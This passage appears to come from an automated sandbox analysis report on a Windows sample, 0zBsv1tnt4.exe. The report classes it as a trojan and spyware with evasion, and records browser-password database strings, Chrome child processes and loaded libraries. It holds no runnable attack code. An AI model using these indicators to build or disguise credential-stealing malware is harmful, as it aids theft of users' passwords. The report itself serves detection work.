Source: 0zBsv1tnt4.exe, 00000000.00000003.1754904265.00000000060C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746479114.0000000006181000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741476081.00000000060D4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754281518.00000000061EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744751091.0000000006068000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748897132.00000000061B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747118596.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743741710.0000000005F93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740389976.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749584722.0000000005F86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748356756.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744105460.0000000006064000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756772508.0000000005F89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743374680.0000000006123000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741958081.0000000006038000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747805245.000000000618E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742336878.0000000006043000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749848322.00000000060A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742541445.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746989670.000000000608D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745145340.0000000005F89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753817708.00000000061F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1751446021.00000000060B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754126968.00000000060B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741669573.0000000006033000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744232506.000000000613E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746090034.0000000006085000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743611102.0000000006059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755218944.00000000060C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743262102.000000000604C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741763407.00000000060E5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740571438.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746216617.0000000005F93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741568865.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782456195.0000000005B08000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748780223.000000000609B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746738659.0000000006091000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756118663.0000000006225000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744328710.0000000005F90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741289529.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755437071.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748509228.0000000006097000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742950074.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745418315.0000000006163000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743052594.0000000006054000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750849182.0000000005F92000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754602705.00000000060D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742441245.0000000006101000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754446126.0000000005F94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750190869.00000000061BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754752682.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757248589.00000000060DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1752408659.0000000005F88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740927812.0000000005F93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743156369.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744452780.0000000006066000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748217188.0000000006190000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745262579.000000000606C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746350752.0000000006084000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753356306.00000000061CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745633174.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748075823.0000000006089000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740750624.0000000006024000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741197031.0000000006035000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755062115.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743865487.0000000006062000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753968777.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744891784.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743977874.0000000005F87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756399432.0000000005F94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742848021.0000000006049000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753664817.00000000060C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1877406895.0000000006516000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756610935.00000000060DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741382035.0000000006029000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740289499.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.000000000624B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757085700.0000000005F88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746866682.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740661280.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744585438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749142697.0000000005F86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747250816.0000000006089000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0zBsv1tnt4.exe Static PE information: Section: ZLIB complexity 0.9996425653594772
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/67@9/5
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00982070 CoCreateInstance, 0_2_00982070
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0zBsv1tnt4.exe, 00000000.00000003.1512072127.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1536544821.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1537140056.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511972385.0000000005B06000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0zBsv1tnt4.exe Virustotal: Detection: 52%
Source: 0zBsv1tnt4.exe ReversingLabs: Detection: 57%
Source: 0zBsv1tnt4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 0zBsv1tnt4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe String found in binary or memory: 1RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File read: C:\Users\user\Desktop\0zBsv1tnt4.exe
Source: unknown Process created: C:\Users\user\Desktop\0zBsv1tnt4.exe "C:\Users\user\Desktop\0zBsv1tnt4.exe"
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wininet.dll
